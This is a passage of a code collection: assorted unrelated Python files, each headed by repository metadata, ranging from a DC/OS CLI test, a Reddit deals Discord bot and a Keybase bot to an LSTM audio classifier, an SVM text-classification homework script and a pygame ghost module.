assert len(registry['packages']) == 1
@patch('dcos.package.Package.package_json')
@patch('dcos.package.Package.config_json')
def test_bad_config_schema_msg(config_mock, package_mock):
pkg = package.Package("", "/")
config_mock.return_value = {}
package_mock.return_value = {'maintainer': '<EMAIL>'}
with pytest.raises(DCOSException) as e:
pkg.options("1", {})
msg = ("An object in the package's config.json is missing the "
"required 'properties' feature:\n {}"
"\nPlease contact the project maintainer: <EMAIL>")
assert e.exconly().split(':', 1)[1].strip() == msg
def _get_app_labels(app_id):
returncode, stdout, stderr = exec_command(
['dcos', 'marathon', 'app', 'show', app_id])
assert returncode == 0
assert stderr == b''
app_json = json.loads(stdout.decode('utf-8'))
return app_json.get('labels')
def _install_helloworld(
args=['--yes'],
stdout=b'A sample pre-installation message\n'
b'Installing Marathon app for package [helloworld] '
b'version [0.1.0]\n'
b'Installing CLI subcommand for package [helloworld] '
b'version [0.1.0]\n'
b'New command available: dcos helloworld\n'
b'A sample post-installation message\n',
returncode=0,
stdin=None):
assert_command(
['dcos', 'package', 'install', 'helloworld'] + args,
stdout=stdout,
returncode=returncode,
stdin=stdin)
def _uninstall_helloworld(
args=[],
stdout=b'',
stderr=b'',
returncode=0):
assert_command(['dcos', 'package', 'uninstall', 'helloworld'] + args,
stdout=stdout,
stderr=stderr,
returncode=returncode)
def _uninstall_chronos(args=[], returncode=0, stdout=b'', stderr=''):
result_returncode, result_stdout, result_stderr = exec_command(
['dcos', 'package', 'uninstall', 'chronos'] + args)
assert result_returncode == returncode
assert result_stdout == stdout
assert result_stderr.decode('utf-8').startswith(stderr)
def _install_chronos(
args=['--yes'],
returncode=0,
stdout=b'Installing Marathon app for package [chronos] '
b'version [2.4.0]\n',
stderr=b'',
preInstallNotes=b'We recommend a minimum of one node with at least 1 '
b'CPU and 2GB of RAM available for the Chronos '
b'Service.\n',
postInstallNotes=b'Chronos DCOS Service has been successfully '
b'''installed!
\tDocumentation: http://mesos.github.io/chronos
\tIssues: https://github.com/mesos/chronos/issues\n''',
stdin=None):
cmd = ['dcos', 'package', 'install', 'chronos'] + args
assert_command(
cmd,
returncode,
preInstallNotes + stdout + postInstallNotes,
stderr,
stdin=stdin)
def _list(args=['--json'],
stdout=b'[]\n'):
assert_command(['dcos', 'package', 'list'] + args,
stdout=stdout)
def _helloworld():
stdout = b'''A sample pre-installation message
Installing Marathon app for package [helloworld] version [0.1.0]
Installing CLI subcommand for package [helloworld] version [0.1.0]
New command available: dcos helloworld
A sample post-installation message
'''
return _package('helloworld',
stdout=stdout)
@contextlib.contextmanager
def _package(name,
stdout=b'',
uninstall_stderr=b'',
args=['--yes']):
"""Context manager that installs a package on entrace, and uninstalls it on
exit.
:param name: package name
:type name: str
:param stdout: Expected stdout
:type stdout: str
:param uninstall_stderr: Expected stderr
:type uninstall_stderr: str
:param args: extra CLI args
:type args: [str]
:rtype: None
"""
assert_command(['dcos', 'package', 'install', name] + args,
stdout=stdout)
try:
yield
finally:
assert_command(
['dcos', 'package', 'uninstall', name],
stderr=uninstall_stderr)
| 1.796875
| 2
|
cogs/reddit/gamedeals.py
|
santoshpanna/Discord-Bot
| 0
|
12783866
|
import praw, os, discord, requests
from steamstorefront import SteamStoreFront
from datetime import datetime
from collections import deque
from bs4 import BeautifulSoup
from common import common, database
from ..helpers import steam, gamedeals, guild
from ..helpers.gamedeals import isFromAcceptableStore
class GameDeals:
r = None
steam = None
# constructor to initialize varialbles
def __init__(self):
config = common.getConfig()
self.masterLogger = common.getMasterLog()
self.r = praw.Reddit(client_id=config['REDDIT']['client.id'], client_secret=config['REDDIT']['client.secret'], user_agent=config['REDDIT']['user.agent'])
self.steam = steam.Steam()
self.ssf = SteamStoreFront()
# get new results
def getSubreddit(self, subreddit, limit):
rsub = self.r.subreddit(subreddit)
res = rsub.new(limit=limit)
return res
def keyDoesNotExists(self, deq, dict):
for el in deq:
if el['url'] == dict['url']:
return False
return True
async def run(self, bot):
masterLogger = common.getMasterLog()
db = database.Database()
# subreddits to fetch
subreddits = ['gamedeals', 'steamdeals', 'freegamefindings']
# final post container of non existing and distinct deals
enriched_post = deque()
# for each subreddit
for subreddit in subreddits:
# get the service record
service = db.getService(subreddit)
if 'latest' not in service:
service['latest'] = None
# get the latest submissions
posts = []
try:
posts = self.getSubreddit(subreddit, 30)
except Exception:
await bot.get_channel(masterLogger).send(f"**Error** : unable to fetch r/{subreddit}")
# id container
id = None
if common.getEnvironment() == 'dev':
# post log in masterlogger
await bot.get_channel(masterLogger).send(f"scraped {subreddit}.")
# iterate through posts
for post in posts:
# this is done for getting the first id
if not id:
id = post.id
# if there are no new post, break
if post.id == service['latest']:
break
if isFromAcceptableStore(post):
deal = {}
deal['title'] = post.title
deal['id'] = post.id
if "reddit.com" in post.url:
deal['url'] = gamedeals.getStoreLink(post)
else:
deal['url'] = gamedeals.removeURI(post.url)
deal['created'] = common.getTimeFromTimestamp(post.created)
if 'url' in deal and deal['url']:
# check if its steam store link
if 'steampowered.com' in deal['url']:
price = None
try:
price = self.ssf.getPrice(url=deal['url'])
except InvalidArgument as e:
if common.getEnvironment() == 'prod' or common.getEnvironment() == 'dev':
await bot.get_channel(masterLogger).send(f"error getting price for {deal['url']} of reddit id {deal['id']}. Arguments passed {e.error}, error type {e.type}.")
pass
if price:
deal['price'] = price['final']
if self.keyDoesNotExists(enriched_post, deal):
enriched_post.appendleft(deal)
# update database
data = {}
data["name"] = subreddit
if len(enriched_post) > 0:
data["lastposted"] = common.getDatetimeIST()
if id:
data["latest"] = id
status = db.upsertService(data)
if status == common.STATUS.SUCCESS.INSERTED:
await bot.get_channel(masterLogger).send(f"**Created Service**: {data['name']}.")
elif status == common.STATUS.FAIL.INSERT:
await bot.get_channel(masterLogger).send(f"**DB Insert Error - Service**: {data['name']}.")
elif status == common.STATUS.FAIL.UPDATE:
await bot.get_channel(masterLogger).send(f"**DB Update Error - Service**: {data['name']}.")
else:
pass
# send the final deque for posting
await self.send(enriched_post, bot)
# steam deals
async def send(self, posts, bot):
db = database.Database()
# go through new submissions
for post in posts:
status = db.upsertGameDeal(post)
# 1 = updated, 2 = created, -1 = error in update/inserting
channels = guild.getChannels('gamedeals')
for channel in channels:
# the deal already exists
if status == common.STATUS.SUCCESS.UPDATED:
# price check for steam games
if 'steampowered.com' in post['url']:
try:
existingDeal = db.getGameDeal(post)
new_price = self.ssf.getPrice(url=post['url'])
new_price = new_price['final'] if new_price else 9223372036854775806
if 'price' in existingDeal:
old_price = existingDeal['price']
# if new price is less than older price post the deal
if int(new_price) < int(old_price):
await self.steam.post(bot, channel, post)
# can't compare price, so leave the deal
except InvalidArgument as e:
if common.getEnvironment() == 'prod' or common.getEnvironment() == 'dev':
await bot.get_channel(common.getMasterLog()).send(f"error getting price for {post['url']} of reddit id {post['id']}. Arguments passed {e.error}, error type {e.type}.")
pass
# else:
# await self.steam.post(bot, channel, post)
# the deal is a new one
elif status == common.STATUS.SUCCESS.INSERTED:
# special handler for steam
if 'steampowered.com' in post['url']:
await self.steam.post(bot, channel, post)
else:
await bot.get_channel(channel['channel_id']).send(post['url'])
# if logging is enabled post log
if 'logging' in channel:
await bot.get_channel(channel['logging']).send(f"sent {post['title']} in {channel['channel_name']}")
# there has been error updating or inserting deal
else:
# log it in master log
bot.get_channel(self.masterLogger).send(f"**DB Error**: Failed Updating/Inserting {post['id']}.")
| 2.59375
| 3
|
examples/settings.py
|
fakegit/googlevoice-1
| 156
|
12783867
|
import pprint
from googlevoice import Voice
def run():
voice = Voice()
voice.login()
pprint.pprint(voice.settings)
__name__ == '__main__' and run()
| 1.914063
| 2
|
models/Simple_LSTM.py
|
Pheithar/Animal-Sounds
| 1
|
12783868
|
<filename>models/Simple_LSTM.py<gh_stars>1-10
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from tqdm import tqdm
import torchvision
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import accuracy_score
from . import utils
class SimpleLSTM(nn.Module):
# Init
def __init__(self, net_arch: dict):
super(SimpleLSTM, self).__init__()
input_size = net_arch["input_size"]
hidden_size = net_arch["hidden_size"]
num_layers = net_arch["num_layers"]
lstm_dropout = net_arch["lstm_dropout"]
assert len(net_arch["linear_features"]) == 1 + len(net_arch["linear_dropout"]),\
f"Lenght of linear features ({len(net_arch['linear_features'])})"\
f" must be one more than the the lenght of linear dropout"\
f" ({len(net_arch['linear_dropout'])})."
self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True,
dropout=lstm_dropout)
# Layers - Linear
self.dense = nn.ModuleList()
self.ldrop = nn.ModuleList()
# Flatten
input_channels = hidden_size
for linear_features in net_arch["linear_features"]:
layer = nn.Linear(input_channels, linear_features)
self.dense.append(layer)
# Update parameters
input_channels = linear_features
for drop in net_arch["linear_dropout"]:
self.ldrop.append(nn.Dropout(drop))
# Activation
self.relu = nn.ReLU()
self.last_activation = eval("nn." + net_arch["last_layer_activation"])
def forward(self, x):
x, _ = self.lstm(x)
x = x[:, -1]
for dense, dropout in zip(self.dense, self.ldrop):
x = dense(x)
x = self.relu(x)
x = dropout(x)
x = self.last_activation(self.dense[-1](x))
return x
def fit(self, num_epochs: int, train_loader: DataLoader,
validation_loader: DataLoader,
criterion, optimizer,
show: bool = True, frequency_val : int = 2,
log_file: str = None, plot_file: str = None,
train_name: str = "Network"):
sns.set()
if log_file:
with open(log_file, "a") as f:
f.write(train_name + "\n")
train_loss = []
train_acc = []
plot_epochs_train = []
val_loss = []
val_acc = []
plot_epochs_val = []
fig, (loss_ax, acc_ax) = plt.subplots(2, 1, figsize=(12, 10))
for epoch in tqdm(range(num_epochs), desc=f"Training {train_name}"):
running_loss = 0.0
running_accuracy = 0.0
# State that the network is in train mode
self.train()
for i, data in enumerate(train_loader):
# Get the inputs
val = data
inputs, labels = val["mfcc"], val["label"]
inputs = utils.get_cuda(inputs)
labels = utils.get_cuda(labels)
# Make them variables
optimizer.zero_grad()
# Forward, backward and around
outputs = self(inputs)
# print(outputs.shape, labels.shape)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
labels = utils.get_numpy(self.compute_prediction(labels))
outputs = utils.get_numpy(self.compute_prediction(outputs))
running_accuracy += accuracy_score(outputs, labels)
running_loss += loss.data.item()
train_loss.append(running_loss / len(train_loader))
train_acc.append(running_accuracy / len(train_loader))
plot_epochs_train.append(epoch+1)
if epoch % frequency_val == 0 or epoch == num_epochs-1:
running_loss = 0.0
running_accuracy = 0.0
# State that the network is in validation mode
self.eval()
for i, data in enumerate(validation_loader):
# Get the inputs
val = data
inputs, labels = val["mfcc"], val["label"]
inputs = utils.get_cuda(inputs)
labels = utils.get_cuda(labels)
outputs = self(inputs)
loss = criterion(outputs, labels)
labels = utils.get_numpy(self.compute_prediction(labels))
outputs = utils.get_numpy(self.compute_prediction(outputs))
running_accuracy += accuracy_score(outputs, labels)
running_loss += loss.data.item()
val_loss.append(running_loss / len(validation_loader))
val_acc.append(running_accuracy / len(validation_loader))
plot_epochs_val.append(epoch+1)
if log_file:
with open(log_file, "a") as f:
f.write("-------------------------------------------\n")
f.write(f"Epoch {epoch+1}:\n")
f.write(f"\t Train Loss: {train_loss[-1]:.2f}\n")
f.write(f"\t Train Accuracy: {train_acc[-1]:.2f}\n")
f.write(f"\t Validation Loss: {val_loss[-1]:.2f}\n")
f.write(f"\t Validation Accuracy: {val_acc[-1]:.2f}\n")
step = max(int(len(plot_epochs_train) // 10), 1)
loss_ax.set_title("Loss function value in the train and validation sets")
loss_ax.plot(plot_epochs_train, train_loss, label="Train Loss")
loss_ax.plot(plot_epochs_val, val_loss, label="Validation Loss")
loss_ax.set_xlabel("Epochs")
loss_ax.set_ylabel("Value")
loss_ax.legend()
loss_ax.set_xticks(range(1, len(plot_epochs_train), step))
acc_ax.set_title("Accuracy of the train and validation sets")
acc_ax.plot(plot_epochs_train, train_acc, label="Train Accuracy")
acc_ax.plot(plot_epochs_val, val_acc, label="Validation Accuracy")
acc_ax.set_xlabel("Epochs")
acc_ax.set_ylabel("Percentage")
acc_ax.set_xticks(range(1, len(plot_epochs_train), step))
acc_ax.legend()
if plot_file:
plt.savefig(plot_file)
if show:
plt.show()
else:
plt.close()
return ((train_loss[-1], train_acc[-1]), (val_loss[-1], val_acc[-1]))
def compute_prediction(self, y):
if y.shape[1] == 1:
return y.int()
return torch.max(y, 1)[1]
| 2.5625
| 3
|
examples/1_clap_for_everything.py
|
InnovativeInventor/pykeybasebot
| 117
|
12783869
|
<reponame>InnovativeInventor/pykeybasebot<gh_stars>100-1000
#!/usr/bin/env python3
###################################
# WHAT IS IN THIS EXAMPLE?
#
# This bot listens in one channel and reacts to every text message.
###################################
import asyncio
import logging
import os
import sys
import pykeybasebot.types.chat1 as chat1
from pykeybasebot import Bot
logging.basicConfig(level=logging.DEBUG)
if "win32" in sys.platform:
# Windows specific event-loop policy
asyncio.set_event_loop_policy(
asyncio.WindowsProactorEventLoopPolicy() # type: ignore
)
async def handler(bot, event):
if event.msg.content.type_name != chat1.MessageTypeStrings.TEXT.value:
return
channel = event.msg.channel
msg_id = event.msg.id
await bot.chat.react(channel, msg_id, ":clap:")
listen_options = {"filter-channel": {"name": "yourbot,someoneelse"}}
bot = Bot(username="yourbot", paperkey=os.environ["KEYBASE_PAPERKEY"], handler=handler)
asyncio.run(bot.start(listen_options))
| 2.75
| 3
|
RegionMap-datagen.py
|
derrickmehaffy/EliteDangerousRegionMap
| 8
|
12783870
|
#!/bin/env python3
from PIL import Image
from numpy import asarray
import json
regionmap = asarray(Image.open('RegionMap.png'))
region1 = 42 * 4
regions = [
None,
"Galactic Centre",
"Empyrean Straits",
"Ryker's Hope",
"Odin's Hold",
"Norma Arm",
"Arcadian Stream",
"Izanami",
"Inner Orion-Perseus Conflux",
"Inner Scutum-Centaurus Arm",
"Norma Expanse",
"Trojan Belt",
"The Veils",
"Newton's Vault",
"The Conduit",
"Outer Orion-Perseus Conflux",
"Orion-Cygnus Arm",
"Temple",
"Inner Orion Spur",
"Hawking's Gap",
"Dryman's Point",
"Sagittarius-Carina Arm",
"<NAME>",
"Acheron",
"Formorian Frontier",
"Hieronymus Delta",
"Outer Scutum-Centaurus Arm",
"Outer Arm",
"Aquila's Halo",
"Errant Marches",
"Perseus Arm",
"Formidine Rift",
"Vulcan Gate",
"Elysian Shore",
"Sanguineous Rim",
"Outer Orion Spur",
"Achilles's Altar",
"Xibalba",
"Lyra's Song",
"Tenebrae",
"The Abyss",
"Kepler's Crest",
"The Void"
]
lines = []
for l in regionmap[::-1]:
rle = []
p = 0
n = 0
for px in l:
px = 0 if px == 0 else (region1 - px) // 4 + 1
if px != p:
rle.append((n, p))
p = px
n = 1
else:
n += 1
rle.append((n, p))
lines.append(rle)
with open('RegionMapData.py', 'wt') as f:
f.write('#!/bin/env python3\n')
f.write('\n')
f.write('regions = [\n')
for r in regions:
f.write(' {0},\n'.format(repr(r)))
f.write(']\n')
f.write('\n')
f.write('regionmap = [\n')
for l in lines:
f.write(' {0},\n'.format(repr(l)))
f.write(']\n')
f.write('\n')
with open('RegionMapData.json', 'wt') as f:
f.write('{\n')
f.write(' "regions": [\n')
f.write(' {0}\n'.format(',\n '.join(json.dumps(r) for r in regions)))
f.write(' ],\n')
f.write(' "regionmap": [\n');
f.write(' {0}\n'.format(',\n '.join(json.dumps([[int(rl), int(rv)] for rl, rv in l]) for l in lines)))
f.write(' ]\n')
f.write('}\n')
with open('RegionMapData.cs', 'wt') as f:
f.write('namespace EliteDangerousRegionMap\n')
f.write('{\n')
f.write(' public static partial class RegionMap\n')
f.write(' {\n')
f.write(' private static string[] RegionNames = new[]\n')
f.write(' {\n')
for r in regions:
f.write(' {0},\n'.format(json.dumps(r)))
f.write(' };\n')
f.write('\n')
f.write(' private static (int, int)[][] RegionMapLines = new[]\n')
f.write(' {\n')
for row in lines:
f.write(' new[]{' + ','.join(repr((l, v)) for l, v in row) + '},\n')
f.write(' };\n')
f.write(' }\n')
f.write('}\n')
| 2.46875
| 2
|
biblescrapeway/cli.py
|
jonathanvanschenck/biblescrapeway
| 0
|
12783871
|
import click
import json
from pathlib import Path
from .query import query
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
def _format_line(obj, _format):
if _format == 'refstr':
return obj.to_string()
if _format == 'str':
return '`{}` ({})'.format(obj.text,obj.version)
def _formatter(obj_list, _format):
# Handle json
if _format == 'json':
return json.dumps([v.to_dict() for v in obj_list],indent=4)
# Handle everything else
return "\n".join([_format_line(obj,_format) for obj in obj_list])
@click.command(context_settings=CONTEXT_SETTINGS)
@click.option('--version', '-v', default='ESV', help='Bible version to query, default is `ESV`')
@click.option('--format', '-f', '_format', default='refstr', type=click.Choice(['refstr','str','json']),
help='Specify output format, default is `refstr`')
@click.option('--cache/--no-cache', default=False,
help='Look up verses saved in a local cache first, and save new queries locally')
@click.argument('reference_string')
def scrap(version, reference_string, _format, cache):
"""Scrap bible verses
REFERENCE_STRING a (comma delimited) list of references, e.g. `John3.16` or `1Peter3.1-5` or `Gen1,2`
"""
verses = query( reference_string, version, cache )
click.echo(_formatter(verses, _format))
| 2.5
| 2
|
final report/svm.py
|
core-not-dumped/Introduction_to_Artificial_Intelligence
| 0
|
12783872
|
# -*- coding: utf-8 -*-
from hw7_util import *
class Preprocessing(AI_util):
def Calculate_Binary(self, data: List[Tuple[str, List[str], int]]) -> List[Tuple[str, List[float], int]]:
"""
*** You should implement this function with raw code ***
*** When you code, you have to erase this comment ***
(input) 'data' type : List[Tuple[str, List[str], int]]
(input) 'data' format : [(document id, tokenized text, category index)]
(output) return type : List[Tuple[str, List[float], int]]
(output) return format : [(document id, Binary vector, category index)]
"""
binary_all = list()
for (list_id,tokenized_text,cate) in data:
binary_tmp = list(0 for i in range(len(self.word2idx)))
for append_word in tokenized_text:
if append_word in self.word2idx.keys():
binary_tmp[self.word2idx[append_word]] = 1
binary = (list_id, binary_tmp, cate)
binary_all.append(binary)
return binary_all
def Calculate_TF(self, data: List[Tuple[str, List[str], int]]) -> List[Tuple[str, List[float], int]]:
"""
*** You should implement this function with raw code ***
*** When you code, you have to erase this comment ***
(input) 'data' type : List[Tuple[str, List[str], int]]
(input) 'data' format : [(document id, tokenized text, category index)]
(output) return type : List[Tuple[str, List[float], int]]
(output) return format : [(document id, TF, category index)]
"""
tf_all = list()
for (list_id,tokenized_text,cate) in data:
tf_tmp = list(0 for i in range(len(self.word2idx)))
for append_word in tokenized_text:
if append_word in self.word2idx.keys():
tf_tmp[self.word2idx[append_word]] += 1
tf = (list_id,tf_tmp,cate)
tf_all.append(tf)
return tf_all
def Calculate_TF_IDF_Normalization(self, data: List[Tuple[str, List[str], int]], data_type: str) -> List[Tuple[str, List[float], int]]:
"""
*** You should implement this function with raw code ***
*** When you code, you have to erase this comment ***
(input) 'data' type : List[Tuple[str, List[str], int]]
(input) 'data' format : [(document id, tokenized text, category index)]
(output) return type : List[Tuple[str, List[float], int]]
(output) return format : [(document id, normalized tf-idf, category index)]
"""
tf = list()
for (list_id,tokenized_text,cate) in data:
tf_tmp = list(0 for i in range(len(self.word2idx)))
for append_word in tokenized_text:
if append_word in self.word2idx.keys():
tf_tmp[self.word2idx[append_word]] += 1
tf.append(tf_tmp)
if len(data)>200:
self.idf = list(0 for i in range(len(self.word2idx)))
for (list_id,tokenized_text,cate) in data:
idf_tmp = list(0 for i in range(len(self.word2idx)))
for append_word in tokenized_text:
if append_word in self.word2idx.keys():
idf_tmp[self.word2idx[append_word]] = 1
for i in range(len(self.word2idx)):
self.idf[i] += idf_tmp[i]
for i in range(len(self.word2idx)):
self.idf[i] = math.log(float(len(data))/float(self.idf[i]),2)
tfidf_all = list()
for i in range(len(tf)):
tfidf_tmp = list(0 for j in range(len(self.word2idx)))
tfidf_sqare_sum_tmp = 0
for j in range(len(self.word2idx)):
tfidf_tmp[j] = tf[i][j] * self.idf[j]
tfidf_sqare_sum_tmp += (tfidf_tmp[j] * tfidf_tmp[j])
for j in range(len(self.word2idx)):
tfidf_tmp[j] = tfidf_tmp[j] / math.sqrt(tfidf_sqare_sum_tmp)
tfidf = (data[i][0], tfidf_tmp, data[i][2])
if i == 0:
print(tfidf)
tfidf_all.append(tfidf)
return tfidf_all
def main(data, label2idx):
std_name = "이승태"
std_id = "2017313107"
result = dict()
for inp_type, tr, te in tqdm(data, desc='training & evaluating...'):
"""
This function is for training and evaluating (testing) SVM Model.
"""
### EDIT HERE ###
train_inputs = list()
train_label = list()
test_inputs = list()
test_label = list()
for i in range(len(tr)):
train_inputs.append(tr[i][1])
train_label.append(tr[i][2])
for i in range(len(te)):
test_inputs.append(te[i][1])
test_label.append(te[i][2])
classifier = LinearSVC(C=1.0,max_iter=1000)
classifier.fit(train_inputs, train_label)
prediction = classifier.predict(test_inputs)
result[inp_type] = dict()
accur_map = np.zeros((5,5))
accuracy = 0.0
number_of_docs = np.zeros(5)
for i in range(len(te)):
number_of_docs[test_label[i]] += 1
accur_map[prediction[i]][test_label[i]] += 1
if prediction[i] == test_label[i]:
accuracy += 1
accuracy = accuracy / len(te)
print('accuracy:')
print(accuracy)
micro_map = np.zeros((2,2))
precision = np.zeros(5)
recall = np.zeros(5)
label = {0:'entertainment',1:'finance',2:'lifestyle',3:'sports',4:'tv'}
for i in range(5):
TP = accur_map[i][i]
FN = 0.0
FP = 0.0
for j in range(5):
if i==j:
continue
FP += accur_map[i][j]
for j in range(5):
if i==j:
continue
FN += accur_map[j][i]
micro_map[0][0] += TP
micro_map[0][1] += FN
micro_map[1][0] += FP
precision[i] = TP / (FP + TP)
recall[i] = TP / (FN + TP)
f1 = 2 * precision[i] * recall[i] / (precision[i] + recall[i])
result[inp_type][label[i]] = (precision[i] * 100, recall[i] * 100, f1 * 100, number_of_docs[i])
result[inp_type]['accuracy'] = (accuracy * 100, np.sum(number_of_docs))
pre = micro_map[0][0] / (micro_map[0][0] + micro_map[1][0])
re = micro_map[0][0] / (micro_map[0][0] + micro_map[0][1])
f1 = 2 * pre * re / (pre + re)
result[inp_type]['micro avg'] = (pre * 100, re * 100, f1 * 100, np.sum(number_of_docs))
pre = np.sum(precision)/5
re = np.sum(recall)/5
result[inp_type]['macro avg'] = (pre * 100, re * 100, f1 * 100, np.sum(number_of_docs))
print(result)
### END ###
"""
result(input variable for "save_result" function) contains
1. Performance for each labels (precision, recall, f1-score per label)
2. Overall micro/macro average and accuracy for the entire test dataset
3. Convert the result 1 and 2 into percentages by multiplying 100
result type : Dict[str, Dict[str, Union[Tuple[float, float, float, int], Tuple[float, int]]]]
result input format for "save_result" function:
{
'Binary':
{
"entertainment": (precision, recall, f1-score, # of docs),
"finance": (precision, recall, f1-score, # of docs),
"lifestyle": (precision, recall, f1-score, # of docs),
"sports": (precision, recall, f1-score, # of docs),
"tv": (precision, recall, f1-score, # of docs),
"accuracy": (accuracy, total docs),
"micro avg": (precision, recall, f1-score, total docs),
"macro avg": (precision, recall, f1-score, total docs)
},
"TF": ...,
"TF-IDF": ...,
}
"""
save_result(result, std_name=std_name, std_id=std_id)
if __name__ == "__main__":
# *** Do not modify the code below ***
random.seed(42)
np.random.seed(42)
Preprocessing = Preprocessing()
tr_data = Preprocessing.load_data(data_path='./train.json', data_type='train')
Preprocessing.tr_binary = Preprocessing.Calculate_Binary(data=tr_data)
Preprocessing.tr_tf = Preprocessing.Calculate_TF(data=tr_data)
Preprocessing.tr_tfidf = Preprocessing.Calculate_TF_IDF_Normalization(data=tr_data, data_type='train')
te_data = Preprocessing.load_data(data_path='./test.json', data_type='test')
Preprocessing.te_binary = Preprocessing.Calculate_Binary(data=te_data)
Preprocessing.te_tf = Preprocessing.Calculate_TF(data=te_data)
Preprocessing.te_tfidf = Preprocessing.Calculate_TF_IDF_Normalization(data=te_data, data_type='test')
data = [
('Binary', Preprocessing.tr_binary, Preprocessing.te_binary),
('TF', Preprocessing.tr_tf, Preprocessing.te_tf),
('TF-IDF', Preprocessing.tr_tfidf, Preprocessing.te_tfidf)
]
main(data, Preprocessing.label2idx)
# *** Do not modify the code above ***
| 3.265625
| 3
|
numba/cuda/tests/cudapy/test_cuda_autojit.py
|
meawoppl/numba
| 1
|
12783873
|
<gh_stars>1-10
from __future__ import print_function
from numba import unittest_support as unittest
from numba import cuda
import numpy as np
class TestCudaAutojit(unittest.TestCase):
def test_device_array(self):
@cuda.autojit
def foo(x, y):
i = cuda.grid(1)
y[i] = x[i]
x = np.arange(10)
y = np.empty_like(x)
dx = cuda.to_device(x)
dy = cuda.to_device(y)
foo[10, 1](dx, dy)
dy.copy_to_host(y)
self.assertTrue(np.all(x == y))
if __name__ == '__main__':
unittest.main()
| 2.4375
| 2
|
level_3/module/ghost_module.py
|
yogeshwari-vs/2D-Paramotoring-Pygame
| 2
|
12783874
|
import os
import pygame
import random
from level_3.module import background_module
from level_3.module import foreground_module
from level_3.module import player_module
class Ghost():
"""
Describes ghost obstacles.
"""
# Loading ghost images
num_of_imgs = 6
list_of_lists = []
path = r'level_3/Utils/Pics/Ghost/'
colour_list = os.listdir(path)
num_of_colours = len(colour_list)
for colour in colour_list:
imgs = []
for x in range(num_of_imgs):
imgs.append(pygame.image.load(os.path.join(path, colour+"/"+ str(x) + '.png')))
list_of_lists.append(imgs)
ghosts_list = []
collision_ghosts = [] # ghosts for which we have to check collision
def __init__(self,x,y,colour_num):
self.x = x
self.y = y
self.run_count = 0
self.colour_num = colour_num
random_num = random.uniform(6, 10)
self.ghosts_list = [pygame.transform.scale(img, (int(img.get_width()/random_num), int(img.get_height()/random_num))) for img in self.list_of_lists[colour_num]]
# Variables for sine wave trajectory calculation
self.org_y = y # initial y value where the ghost is spawned
self.time = 0 # Taken for a reference
self.frequency = random.uniform(0.005, 0.013) # frequency of sine wave
self.amplitude = random.randrange(30, 70) # Amplitude of sine wave - defines range of ghost movement in y axis
def draw(self, win):
# Determining index of ghost image to be drawn
self.frames_per_image = 7 # each ghost image is drawn for 7 consecutive frames
if self.run_count >= self.frames_per_image*self.num_of_imgs:
self.run_count = 0
self.index = self.run_count//self.frames_per_image
self.run_count += 1
# Drawing ghost image
self.img = self.ghosts_list[self.index]
self.randomize_movement()
win.blit(self.img, (self.x,self.y))
def randomize_movement(self):
# Sine wave trajectory for ghost
self.y= self.org_y
self.time += 1
def create_ghost():
"""
Creates a dragon in the free space.
"""
x = random.randint(50,400) # choose random y value in upper half of window (WIP)
colour_num = random.randrange(Ghost.num_of_colours)
new_ghost = Ghost(background_module.bg.get_width(), x, colour_num)
Ghost.ghosts_list.append(new_ghost)
Ghost.collision_ghosts.append(new_ghost) # To check collision
def draw_ghost(win):
for ghost in Ghost.ghosts_list:
ghost.draw(win)
update_ghosts_position()
def update_ghosts_position():
"""
Updates the x coordinates of ghost. If ghost goes offscreen, remove it from the list.
"""
for ghost in Ghost.ghosts_list:
ghost_width = ghost.imgs[0].get_width()
if ghost.x < -1*ghost_width: # If ghost goes offscreen, removing it from ghost list
try:
ghost.ghosts_list.remove(ghost)
except: pass
else:
ghost.x -= (foreground_module.foreground_speed + 4)
def collision_with_ghost():
"""
Collision with ghost is checked using Pixel perfect collision method. If collision occurs returns True, else False.
Collision is checked only if ghost is near the player to save computation.
"""
player = player_module.player
propeller = player_module.propeller
if len(Ghost.collision_ghosts)!=0:
for ghost in Ghost.collision_ghosts:
if ghost.x < (player.x + player.img.get_width()) and (ghost.x + ghost.img.get_width()) > player.x:
if ghost.y < (player.y + player.img.get_height()) and (ghost.y + ghost.img.get_height()) > player.y: # Checking for collision if near player
player_mask = pygame.mask.from_surface(player.img)
propeller_mask = pygame.mask.from_surface(propeller.propeller_img)
ghost_mask = pygame.mask.from_surface(ghost.img)
offset = int(ghost.x - player.x), int(ghost.y - player.y)
collision_point_with_player = player_mask.overlap(ghost_mask, offset)
collision_point_with_propeller = propeller_mask.overlap(ghost_mask, offset) # Checking collision with player
if collision_point_with_player or collision_point_with_propeller:
Ghost.collision_ghosts.remove(ghost)
return True
return False
| 3.296875
| 3
|
CombineAndRegress.py
|
FVL2020/2DImage2BMI
| 1
|
12783875
|
import json
from sklearn.metrics import mean_squared_error, mean_absolute_error
import numpy as np
from model import Dfembeding
from sklearn.kernel_ridge import KernelRidge
import torch
from PIL import Image
from utils import *
import csv
import torch.utils.data as data
import pandas as pd
def mean_absolute_percentage_error(y_true, y_pred):
y_true, y_pred = np.array(y_true), np.array(y_pred)
return np.mean(np.abs((y_true - y_pred) / y_true)) * 100
# class Dataset(data.Dataset):
# def __init__(self, file, transfrom):
# self.Pic_Names = os.listdir(file)
# self.file = file
# self.transfrom = transfrom
#
# def __len__(self):
# return len(self.Pic_Names)
#
# def __getitem__(self, idx):
# img_name = self.Pic_Names[idx]
# Pic = Image.open(os.path.join(self.file, self.Pic_Names[idx]))
# Pic = self.transfrom(Pic)
# try:
# ret = re.match(r"\d+?_([FMfm])_(\d+?)_(\d+?)_(\d+).+", img_name)
# BMI = (int(ret.group(4)) / 100000) / (int(ret.group(3)) / 100000) ** 2
# Pic_name = os.path.join(self.file, self.Pic_Names[idx])
# return (Pic, Pic_name), BMI
# except:
# return (Pic, ''), 10000
class Dataset(data.Dataset):
def __init__(self, file, transfrom):
self.Pic_Names = os.listdir(file)
self.file = file
self.transfrom = transfrom
def __len__(self):
return len(self.Pic_Names)
def __getitem__(self, idx):
img_name = self.Pic_Names[idx]
Pic = Image.open(os.path.join(self.file, self.Pic_Names[idx]))
Pic = self.transfrom(Pic)
ret = re.match(r"\d+?_([FMfm])_(\d+?)_(\d+?)_(\d+).+", img_name)
sex = 0 if (ret.group(1) == 'F' or ret.group(1) == 'f') else 1
age = int(ret.group(2))
height = int(ret.group(3)) / 100000
weight = int(ret.group(4)) / 100000
